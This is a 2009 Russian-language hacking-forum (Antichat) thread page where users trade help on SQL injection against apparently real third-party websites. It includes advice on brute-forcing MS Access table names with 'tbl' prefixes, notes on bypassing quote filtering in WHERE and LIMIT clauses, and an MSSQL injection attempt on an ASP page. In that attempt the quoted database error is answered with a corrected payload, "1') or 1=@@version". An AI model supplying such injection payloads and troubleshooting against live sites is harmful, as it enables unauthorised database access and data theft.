 |
|
05.11.2009, 17:01
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Byrger
Я много чего читал но не сталкивался с такой инъекцией
Она ещё в eval() помойму....
Ну и чего ты ждёшь? Что-бы тебе переписали какую-нибудь статью сюда, или нужно применить телепатию и всех победить без линка?
|
|
|
05.11.2009, 17:22
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
С нами:
9055208
Репутация:
5
|
|
Нужен словарь для брута таблиц и колонок СУБД MSACCESS ,пробовал для мускула-не одной таблы.
Заранее благодарен
|
|
|
|
05.11.2009, 17:28
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от 2Fed123
Нужен словарь для брута таблиц и колонок СУБД MSACCESS ,пробовал для мускула-не одной таблы.
Заранее благодарен
прогони с префиксом tbl или tbl_
|
|
|
|
05.11.2009, 17:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
Byrger,
в.1 вырезается ' => and пройдет только в where => where lala=col_{inj} (col_2-1 true, col_-1 unknown column col_)
в.2 (более правдивый) из названия переменной inj в limit или offset, $page берется c intval()
|
|
|
|
05.11.2009, 18:43
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
нашел MSSQL inj . Дописываю к концу линка or 1=@@version-- и ничего не выводит, просто голый лист! Что делать?
П.С. ;select+@@version - тоже не катит...
П.П.С. Учитывая, что выводит это
Код:
Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string '1', ')'. /scripts/UserStatistic.asp, line 26
Последний раз редактировалось jecka3000; 05.11.2009 в 19:16..
|
|
|
|
05.11.2009, 19:12
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
С нами:
9055208
Репутация:
5
|
|
jokester
Прогнал-ничего(
|
|
|
|
05.11.2009, 19:26
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от 2Fed123
jokester
Прогнал-ничего(
Чиорт, а мне хакеры посоветовали так сделать 
Обманули негодяи значит
Нет специальных словарей под разные базы, но я на 99% уверен, что там префикс, если у тебя нормальный словарь. Сам понимаешь, угадать его не получится. В СИПТе если не ошибаюсь, есть словарь префиксов
PS Хотя ... Вон l1ght гадает на картах и предсказывает будущее по фотографии 
Последний раз редактировалось jokester; 05.11.2009 в 19:30..
|
|
|
|
05.11.2009, 19:27
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
ау...люди ..помогите с моей проблемой тож))
|
|
|
|
05.11.2009, 20:08
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от jecka3000
нашел MSSQL inj . Дописываю к концу линка or 1=@@version-- и ничего не выводит, просто голый лист! Что делать?
П.С. ;select+@@version - тоже не катит...
П.П.С. Учитывая, что выводит это
Код:
Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string '1', ')'. /scripts/UserStatistic.asp, line 26
Нынче головой думать не тру =\
1') or 1=@@version и закрой чем нить =\
|
|
|
|
05.11.2009, 20:15
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
ctacok,
я поробовал и не только такую комбинаци+еще раз прочел мануал от Кэша..ничего не выходит.
Вот ответ базы на твой запрос:
There are more columns in the INSERT statement than values specified in the VALUES clause. The number of values in the VALUES clause must match the number of columns specified in the INSERT statement.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
